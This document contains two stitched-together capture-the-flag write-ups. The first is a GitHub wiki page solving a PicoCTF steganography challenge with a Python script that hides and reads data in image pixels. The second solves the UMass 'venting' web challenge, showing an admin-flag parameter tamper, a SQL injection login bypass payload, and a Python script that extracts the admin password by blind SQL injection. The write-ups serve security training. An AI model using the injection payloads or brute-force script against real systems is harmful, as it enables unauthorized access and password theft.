octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron js-wiki-sidebar-toc-toggle-chevron-open mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : st3g0</span> </div> </summary> Description Files Solution Recon Execution Flag </details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> PicoCTF : Transposition Trial</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/PicoCTF-:-Transposition-Trial/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Easy Crypto Challenge</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Easy-Crypto-Challenge/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Information Paradox</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Information-Paradox/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Invisible Stargate</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Invisible-Stargate/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Off The Grid</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Off-The-Grid/_toc"> </include-fragment></details> <details class="details-reset" > <summary> <div class="d-flex flex-items-start"> <div class="p-2 mt-n1 mb-n1 ml-n1 btn btn-octicon js-wiki-sidebar-toc-toggle-chevron-button "> <svg hidden="hidden" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="js-wiki-sidebar-toc-spinner mr-0 v-align-text-bottom anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down js-wiki-sidebar-toc-toggle-chevron mr-0"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg> </div> <span> Space Heroes CTF : Strange Traffic</span> </div> </summary> <include-fragment class="js-wiki-sidebar-toc-fragment" loading="lazy" src="https://github.com/not1cyyy/CTF-Writeups/wiki/Space-Heroes-CTF-:-Strange-Traffic/_toc"> </include-fragment></details> </div></div> </div> <h5 class="mt-0 mb-2">Clone this wiki locally</h5> <div class="width-full input-group"> <input id="wiki-clone-url" type="text" data-autoselect class="form-control input-sm text-small color-fg-muted input-monospace" aria-label="Clone URL for this wiki" value="https://github.com/not1cyyy/CTF-Writeups.wiki.git" readonly> <span> <clipboard-copy for="wiki-clone-url" aria-label="Copy to clipboard" data-view-component="true" class="btn btn-sm zeroclipboard-button"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg style="display: none;" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check color-fg-success"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg></clipboard-copy> </span> </div> </div></div> <div data-view-component="true" class="Layout-main"> <div id="wiki-body" class="gollum-markdown-content"> <div class="markdown-body"> <h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Description</h1>Download this image and find the flag.Hint : We know the end sequence of the message will be $t3g0.<h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Files</h2>pico.flag.png<h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Solution</h1><h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Recon</h2>$t3g0 ? isn't that LSB encoding ?<h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Execution</h2>I had this python script that was laying in one of my previous ctf challenges that can decode LSB so I ran it against the image :<div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="#import librariesimport sysimport numpy as npfrom PIL import Imagenp.set_printoptions(threshold=sys.maxsize) Download this image and find the flag. Hint : We know the end sequence of the message will be $t3g0. I had this python script that was laying in one of my previous ctf challenges that can decode LSB so I ran it against the image : #encoding functiondef Encode(src, message, dest): img = Image.open(src, 'r') width, height = img.size array = np.array(list(img.getdata())) if img.mode == 'RGB': n = 3 elif img.mode == 'RGBA': n = 4 total_pixels = array.size//n message += "$t3g0" b_message = ''.join([format(ord(i), "08b") for i in message]) req_pixels = len(b_message) if req_pixels > total_pixels: print("ERROR: Need larger file size") else: index=0 for p in range(total_pixels): for q in range(0, 3): if index < req_pixels: array[p][q] = int(bin(array[p][q])[2:9] + b_message[index], 2) index += 1 array=array.reshape(height, width, n) enc_img = Image.fromarray(array.astype('uint8'), img.mode) enc_img.save(dest) print("Image Encoded Successfully") #decoding functiondef Decode(src): img = Image.open(src, 'r') array = np.array(list(img.getdata())) if img.mode == 'RGB': n = 3 elif img.mode == 'RGBA': n = 4 total_pixels = array.size//n hidden_bits = "" for p in range(total_pixels): for q in range(0, 3): hidden_bits += (bin(array[p][q])[2:][-1]) hidden_bits = [hidden_bits[i:i+8] for i in range(0, len(hidden_bits), 8)] message = "" for i in range(len(hidden_bits)): if message[-5:] == "$t3g0": break else: message += chr(int(hidden_bits[i], 2)) if "$t3g0" in message: print("Hidden Message:", message[:-5]) else: print("No Hidden Message Found") #main functiondef Stego(): print("--Welcome to $t3g0--") print("1: Encode") print("2: Decode") func = input() if func == '1': print("Enter Source Image Path") src = input() print("Enter Message to Hide") message = input() print("Enter Destination Image Path") dest = input() print("Encoding...") Encode(src, message, dest) elif func == '2': print("Enter Source Image Path") src = input() print("Decoding...") Decode(src) else: print("ERROR: Invalid option chosen") Stego()">#import librariesimport sysimport numpy as npfrom PIL import Imagenp.set_printoptions(threshold=sys.maxsize) #encoding functiondef Encode(src, message, dest): img = Image.open(src, 'r') width, height = img.size array = np.array(list(img.getdata())) if img.mode == 'RGB': n = 3 elif img.mode == 'RGBA': n = 4 total_pixels = array.size//n message += "$t3g0" b_message = ''.join([format(ord(i), "08b") for i in message]) req_pixels = len(b_message) if req_pixels > total_pixels: print("ERROR: Need larger file size") else: index=0 for p in range(total_pixels): for q in range(0, 3): if index < req_pixels: array[p][q] = int(bin(array[p][q])[2:9] + b_message[index], 2) index += 1 array=array.reshape(height, width, n) enc_img = Image.fromarray(array.astype('uint8'), img.mode) enc_img.save(dest) print("Image Encoded Successfully") #decoding functiondef Decode(src): img = Image.open(src, 'r') array = np.array(list(img.getdata())) if img.mode == 'RGB': n = 3 elif img.mode == 'RGBA': n = 4 total_pixels = array.size//n hidden_bits = "" for p in range(total_pixels): for q in range(0, 3): hidden_bits += (bin(array[p][q])[2:][-1]) hidden_bits = [hidden_bits[i:i+8] for i in range(0, len(hidden_bits), 8)] message = "" for i in range(len(hidden_bits)): if message[-5:] == "$t3g0": break else: message += chr(int(hidden_bits[i], 2)) if "$t3g0" in message: print("Hidden Message:", message[:-5]) else: print("No Hidden Message Found") #main functiondef Stego(): print("--Welcome to $t3g0--") print("1: Encode") print("2: Decode") func = input() if func == '1': print("Enter Source Image Path") src = input() print("Enter Message to Hide") message = input() print("Enter Destination Image Path") dest = input() print("Encoding...") Encode(src, message, dest) elif func == '2': print("Enter Source Image Path") src = input() print("Decoding...") Decode(src) else: print("ERROR: Invalid option chosen") Stego()</div>Or alternatively, we can run Zsteg against the image and we get the same output ! it's as easy as that !<h1><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg>Flag</h1>picoCTF{7h3r3_15_n0_5p00n_87ef5b0b} Or alternatively, we can run Zsteg against the image and we get the same output ! it's as easy as that ! picoCTF{7h3r3_15_n0_5p00n_87ef5b0b} </div> </div></div></div> </div> </div> </div> </turbo-frame> </main> </div> </div> <footer class="footer width-full container-xl p-responsive" role="contentinfo"> <h2 class='sr-only'>Footer</h2> <div class="position-relative d-flex flex-items-center pb-2 f6 color-fg-muted border-top color-border-muted flex-column-reverse flex-lg-row flex-wrap flex-lg-nowrap mt-6 pt-6"> <div class="list-style-none d-flex flex-wrap col-0 col-lg-2 flex-justify-start flex-lg-justify-between mb-2 mb-lg-0"> <div class="mt-2 mt-lg-0 d-flex flex-items-center"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path></svg> <span> © 2023 GitHub, Inc. </span> </div> </div> <nav aria-label='footer' class="col-12 col-lg-8"> <h3 class='sr-only' id='sr-footer-heading'>Footer navigation</h3> Terms Privacy Security Status Docs Contact GitHub Pricing API Training Blog About </nav> </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></footer> <div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> You can’t perform that action at this time. </div> <div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path d="M6.457 1.047c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0 1 14.082 15H1.918a1.75 1.75 0 0 1-1.543-2.575Zm1.763.707a.25.25 0 0 0-.44 0L1.698 13.132a.25.25 0 0 0 .22.368h12.164a.25.25 0 0 0 .22-.368Zm.53 3.996v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 1.5 0ZM9 11a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template> <div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div> <template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 0 1 0 1.5h-1.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-1.5a.75.75 0 0 1 1.5 0v1.5A1.75 1.75 0 0 1 9.25 16h-7.5A1.75 1.75 0 0 1 0 14.25Z"></path><path d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0 1 14.25 11h-7.5A1.75 1.75 0 0 1 5 9.25Zm1.75-.25a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-fg-success d-none m-2"> <path d="M13.78 4.22a.75.75 0 0 1 0 1.06l-7.25 7.25a.75.75 0 0 1-1.06 0L2.22 9.28a.751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018L6 10.94l6.72-6.72a.75.75 0 0 1 1.06 0Z"></path></svg> </clipboard-copy> </div></template> </div> <div id="js-global-screen-reader-notice" class="sr-only" aria-live="polite" ></div> </body></html>
# venting Categories: Web Description:> BHmmmm. This website is kinda sus... Can you become the imposter and vent towards the flag? ## Takeaways Simple blind SQL injection. Content-based SQLi or time-based SQLi works. ## Solution Upon vising the website we are presented with the following page. ![index.png](writeup-resources/index.png) So, let's send a request and see what happens. ![requests.png](writeup-resources/requests.png) As we can see, several requests are sent out. The `GET /inthevents` stands out as it contains an `isAdmin` parameter. So we change it to `true` and repeat the request. ![inthevents.png](writeup-resources/inthevents.png) We follow this secret location and we are presented with a pretty simple admin-login page. ```html <html><head> <link rel="stylesheet" href="static/css/bootstrap.min.css"> <title>Imposter!</title></head> <body> <h1> You vented to admin! Now login with your credentials "admin" </h1> <h2> <form action="/fff5bf676ba8796f0c51033403b35311/login" method="POST"> <label class="form-label mt-4" for="user">Username:</label> <input class="form-control" type="text" id="user" name="user"> <label class="form-label mt-4" for="pass">Password:</label> <input class="form-control" type="text" id="pass" name="pass"> <input class="form-control" type="submit" value="Login"> </form> </h2></body></html>``` ![admin-page.png](writeup-resources/admin-page.png) The comment hints that this is SQL-lite and we should probably do an SQL injection attack. Upon entering `foo'` as `user` and `bar` as `pass`, we are immediately presented with an error: `Error when executing statement -> near "bar": syntax error SELECT * from users WHERE username='foo'' AND Password = 'bar';` So this is definitely vulnerable to SQLi. We try the most basic payload `foo' OR 1=1 -- - `. But the error message now is: `Error when executing statement -> near "ඞඞ": syntax error SELECT * from users WHERE username='foo' OR 1=1 ඞඞ ඞ ' AND Password = 'bar';` With some more testing, we figure out that the application replaces `--` (comment) with `ඞඞ`. So, next I tried leaving an open comment to see what happens: `foo' OR 1=1 /*`. We successfully bypass the login as the rest of the query got commented away: `If you're getting this you're not me. You'll never log in! ALSO I DIDNT HIDE ANYTHING IN MY PASSWORD SO DONT TRY!` From the response, it seems that the password is in the flag. So we have to leak it. This is also a blind SQLi as the application does not respond with the query's data. Remember that the original query is `SELECT * from users WHERE username='foo' AND Password = 'bar';`. We will comment out the password part and replace it with a content-based blind SQLi query. So, the eventual query will look like: `SELECT * from users WHERE username='admin' AND Password LIKE 'UMASS{XXX%' /*...` where we will brute-force the password byte-by-byte. ```pythonimport requestsimport urllib3import stringurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) proxyDict = { "http" : 'http://127.0.0.1:8080', "https" : 'http://127.0.0.1:8080',} password = 'UMASS{'alphabet = string.digits + string.ascii_letterswhile(not password.endswith('}')): print(password) found = False # If no character is found in the alphabet, append the closing '}' for ch in alphabet: new_password = password + ch r = requests.post('http://127.0.0.1:4446/fff5bf676ba8796f0c51033403b35311/login', data = { 'user' : f"admin' AND password LIKE '{new_password}%' /*", 'pass' : "" }, proxies=proxyDict, verify=False, allow_redirects=False ) assert(r.status_code == 200) if r.text == "If you're getting this you're not me. You'll never log in! ALSO I DIDNT HIDE ANYTHING IN MY PASSWORD SO DONT TRY!": password = new_password found = True break if found == False: password += '}' print(password) # UMASS{7h35u55y1mp0573rcr4ck57h3c0d3}``` So the flag is `UMASS{7h35u55y1mp0573rcr4ck57h3c0d3}`.
